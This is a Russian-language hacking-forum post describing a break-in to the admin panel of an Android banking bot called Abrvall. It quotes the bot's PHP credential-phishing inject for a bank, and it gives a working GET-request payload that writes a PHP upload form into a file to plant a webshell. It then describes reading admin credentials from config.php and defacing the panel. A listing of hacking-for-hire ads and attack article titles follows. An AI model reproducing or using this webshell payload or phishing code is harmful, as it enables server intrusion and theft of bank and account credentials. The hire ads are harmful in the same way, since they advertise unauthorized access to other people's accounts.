Взлом ведроид бота Abrvall

Admin

Original poster

Administrator

24.01.2017

Давным-давно мне попался в руки сорц одного андроид-бота. И разумеется, сорц был проанализирован вдоль и поперек.
Автор бота - Conf, ныне в статусе кидалы. Поэтому, ломаем. Говорят, что автор бота умер. Но это не точно. Через день после блека деньги с бтц-кошеля вывели. Ну вы поняли...

Посмотрел я исходники и знаете, был весьма удивлен. Можно, конечно, говорить про XSS да SQL-инъекции (они были, разумеется). Но интереснее другое - в процессе анализа кода, я насчитал больше 20 способов заливки шелла.

В папочке inject лежит добротная кучка инжектов под банки, платежки и соцсети. Рассмотрим кусок кода одного из них (/inject/akbank/verify.php):

PHP:

<?

$acoount = "";

if(isset($_REQUEST["uniqid"])) {
    $uniqid = $_REQUEST["uniqid"];
    $acoount .= $uniqid."|";
}

if(isset($_REQUEST["packet"])) {
    $pack = $_REQUEST["packet"];
    //$acoount .= $pack."|";
    $acoount .= "www.akbank.com|";
}

if(isset($_REQUEST["email"])) {
    $email = $_REQUEST["email"];
    $acoount .= $email."|";
}

if(isset($_REQUEST["login"])) {
    $login = $_REQUEST["login"];
    $acoount .= $login."|";
}

if(isset($_REQUEST["password"])) {
    $passwed = $_REQUEST["password"];
    $acoount .= $passwed;
}

include_once("../../config.php");
$link = mysql_connect($mysql_host, $mysql_user, $mysql_pwd);
if (!$link) {
    die(mysql_close($link));
}
mysql_select_db($mysql_db) || die(mysql_close($link));
mysql_query("INSERT INTO stata (imei, carta) VALUES ('$uniqid', '') ON DUPLICATE KEY UPDATE imei = '" . $uniqid . "', carta = '1'") or die(mysql_close($link));
mysql_close($link);

file_put_contents("../tds/temp/".$uniqid, $acoount."\r\n", FILE_APPEND | LOCK_EX);
if(is_file("../../temp/needinject".$uniqid)) {
    unlink("../../temp/needinject".$uniqid);
}
file_put_contents("../../temp/stopinj".$uniqid, "");

Все здесь прекрасно - нет никакой фильтрации и сходу идет запись в файл.
И что еще прекраснее, в 23 папках лежит схожий verify.php с такими же багами:

Если этого мало, то в корне бота есть savephone.php, sendsms.php и comment.php с аналогичными багами (вдобавок надо только подделать реферер). Но вернемся к файлу verify.php. Льем заливалку GET-запросом:

Код:

http://abrvall/inject/akbank/verify.php?uniqid=312468399102471235.php&email=<form method=post enctype=multipart/form-data><input type=file name=file><input type=submit></form><?php if(is_uploaded_file($_FILES[file][tmp_name])) move_uploaded_file($_FILES[file][tmp_name], $_FILES[file][name]);?>

Переходим на заливалку:

Код:

http://abrvall/inject/tds/temp/312468399102471235.php

Еще пара манипуляций и шелл залит:

Читаем файл config.php в корне, тащим логин/пасс админа, заходим и оставляем доброе послание:

Можно, конечно, сделать что-то менее палевное и куда более веселое, но это уже на ваше усмотрение...

Автор	Заголовок	Раздел	Ответы	Дата
	Взлом ООН: 8Base наносит мощный удар по борцам с неравенством	Новости в сети	0	Пятница в 06:44
	Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев	Новости в сети	0	01.02.2024
	Взлом KyberSwap: математика помогла хакеру украсть $47 млн	Новости в сети	0	27.11.2023
	Взлом криптобиржи Poloniex принёс ущерб в $100 млн.	Новости в сети	0	14.11.2023
	Продавец Взлом почты/соц.сети/мессенджеры	Ищу работу. Предлагаю свои услуги.	1	12.08.2023
W	Заказать услуги Хакера,Взлом на заказ от [email protected] взлом базы данных,удаленный доступ (telegram,Viber,Whatsapp,Gmail,vk.com,OK.ru) Если	Корзина	0	29.04.2022
W	Заказать услуги Хакера,Доступ до БД сайтов,Взлом Сайтов,Взлом на заказ от [email protected] -решение проблем по взлому.	Корзина	0	23.03.2022
B	SERVICE HACKEP [email protected] Услуги Взлома на заказ,заказать услуги взлома,взлом на заказ,сервис взлома. 1. Взлом мессенджеров сообщений:	Корзина	0	08.02.2022
K	Взлом WiFi через Кали линукс с рут правами	Вопросы и интересы	3	23.11.2021
H	Услуги взлома: ВК, WhatsApp, Viber, Instagram / E-mail / Взлом сайтов	Корзина	0	15.11.2021
L	Взлом ВКонтакте на заказ от Фантомаса	Ищу работу. Предлагаю свои услуги.	4	21.08.2021
B	Взлом электронной почты, без предоплаты.	Ищу работу. Предлагаю свои услуги.	0	22.06.2021
L	Интересно Взлом мастер пароля firefox (key4.db)	Бруты/Парсеры/Чекеры	0	06.06.2021
D	Оптовый взлом почты на заказ (цена 20$) Взлом почты Mail.ru Yandex.ru Rambler.ru	Ищу работу. Предлагаю свои услуги.	0	13.01.2021
V	Взлом\|Hack\|HackMessenger\|соц сети мессенджеры почты	Корзина	0	14.10.2020
	Интересно Взлом Wrapped LEO на сумму $42 000	Новости в сети	0	14.10.2020
H	Взлом без предоплат писать на [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Пишите на поч	Корзина	0	03.10.2020
	Интересно Взлом BHF, карты раскрыты	Новости в сети	21	29.09.2020
B	Взлом почты mail.ru , rambler, yandex, корп.почт	Ищу работу. Предлагаю свои услуги.	1	18.09.2020
H	HackService(Услуги Взлома) [email protected] - решение проблем по взлому (Корпоративная,Viber,Whatsapp) 1. Взлом мессенджеров сообщений: 1.1 Взл	Корзина	1	02.08.2020
	Интересно Взлом компьютера одной фразой PasteZort	Уязвимости и взлом	1	31.07.2020
	Интересно Взлом компьютера через презентацию	Уязвимости и взлом	4	30.07.2020
	Интересно Взлом почты при помощи Hydra в Kali Linux	Уязвимости и взлом	2	22.07.2020
M	Услуги хакера и взлом на заказ Заказать взлом? - пишите нам [email protected] Взлом сайта, взлом форума - на заказ! Хотите узнать с кем общается В	Корзина	0	21.07.2020
	Интересно Мой арсенал для пентеста. Глава 1. Взлом wifi	Полезные статьи	4	17.07.2020
3	Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на почту	Корзина	0	16.07.2020
P	Взлом Хорошие цены связь [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Чтобы сделать	Корзина	0	12.07.2020
P	Взлом Хорошие цены связь [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Чтобы сделать	Корзина	0	12.07.2020
X	Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на поч	Ищу работу. Предлагаю свои услуги.	1	08.07.2020
J	Интересно Взлом компьютера через беспроводную мышь или клавиатуру	Уязвимости и взлом	2	05.07.2020
P	Качественный подбор паролей (vk.comOk.ru,WhatsApp.Viber) от [email protected] Взлом сайта, взлом форума - на заказ! Хотите узнать с кем обща	Корзина	0	05.07.2020
	Интересно Взлом WINDOWS 10 с помощью TORAT	Уязвимости и взлом	4	15.06.2020
	Интересно Взлом mail.ru + Способ удаления телефона с mail.ru	Уязвимости и взлом	3	27.05.2020
2	Взлом камер видеонаблюдения через браузер	Уязвимости и взлом	24	15.05.2020
	Интересно Взлом Qiwi кошелька	Уязвимости и взлом	2	14.05.2020
U	Взлом ПК при помощи названия папки.	Уязвимости и взлом	0	13.05.2020
	взлом почты gmail, mail, yandex, yahoo. Взлом социальных сетей (VK, OK,Facebook даже при наличии двухфакторной аутентификации) взлом whatsapp.	Вопросы и интересы	6	11.05.2020
S	[Взлом почты на заказ] Mail.Ru, Yandex.Ru, Rambler.Ru, Ukr.net, Gmail.Com	Ищу работу. Предлагаю свои услуги.	0	03.05.2020
A	Взлом wifi	Вопросы и интересы	9	20.04.2020
D	Взлом без предоплаты WhatsApp instagram vk viber	Уязвимости и взлом	1	20.04.2020
V	Взлом удаление информации в сети	Корзина	0	13.04.2020
V	Взлом удаление информации в сети	Корзина	0	13.04.2020
N	Взлом распечатка СМС и звонков	Уязвимости и взлом	1	28.03.2020
	Интересно Взлом и бесплатная подписка (-95% скидка ) на в любом прокси селлере (способ снятия ограничения)	Раздача dedic/ssh/proxy	1	27.03.2020
N	Взлом ВКонтакте от NEMAFIA. Быстро. Недорого. Без предоплаты.	Корзина	0	22.03.2020
F	Взлом сайта	Предоставляю работу. Ищу специалиста.	0	19.03.2020
B	Взлом (соц. сети, мессенджеры и почты)	Ищу работу. Предлагаю свои услуги.	1	10.03.2020
N	Взлом без предоплаты	Корзина	0	28.02.2020
S	Взлом от имени гендира. Машинное обучение как новый инструмент хакера	Полезные статьи	1	25.02.2020
M	Взлом с помощью изображений атакой Polyglot	Полезные статьи	1	25.02.2020